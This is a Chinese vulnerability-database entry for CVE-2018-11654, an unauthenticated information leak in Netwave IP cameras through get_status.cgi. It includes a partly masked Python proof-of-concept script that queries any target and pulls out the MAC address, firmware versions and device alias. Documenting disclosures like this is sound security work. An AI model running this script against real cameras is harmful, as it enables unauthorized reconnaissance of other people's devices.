Netwave IP Camera 信息泄露漏洞 (CVE-2018-11654)

基本字段

漏洞编号:
SSV-97785
披露/发现时间:
未知
提交时间:
2019-02-11
漏洞等级:
漏洞类别:
信息泄漏
影响组件:
Netwave IP camera
漏洞作者:
David Castro
提交者:
Knownsec
CVE-ID:
CVE-2018-11654
CNNVD-ID:
CNNVD-201808-820
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 共获得  0KB

Information disclosure in Netwave IP camera at get_status.cgi allows an unauthenticated attacker to exfiltrate sensitive information from the device.

共 0  兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import requests
import sys
'''
Author: David Castro (SadFud)
Contact: https://twitter.com/SadFud75
CVE: CVE-2018-11654
Output example:
Mac address: 006E0604AF62
System version: 0.37.2.46
App version: 0.2.9.12
Alias: NOA
The target http://REDACTED:8000 is vulnerable to CVE-2018-11653.
'''
url = sys.argv[1] + "/get_status.cgi"
r = requests.get(url);
if r.status_code != 200:
print "Error. Target not exploitable."
exit()
print "Parsing data..."
r = r.text.encode("utf8")
r = r.replace('\';', '')
r = r.replace('var ', '')
r = r.replace('=\'', ' ')
todo = r.split("\n")
wifi = str(todo[14]).split('=')
if wifi[1].replace(';', '') == str(1):
check = "The target " + sys.argv[1] + " is vulnerable to CVE-2018-11653."
else:
check = "The target " + sys.argv[1] + " is not vulnerable to CVE-2018-11653."
mac = todo[0].split(' ')
mac = mac[1]
sys = todo[1].split(' ')
sys = sys[1]
app = todo[2].split(' ')
app = app[1]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 0 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 4578
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负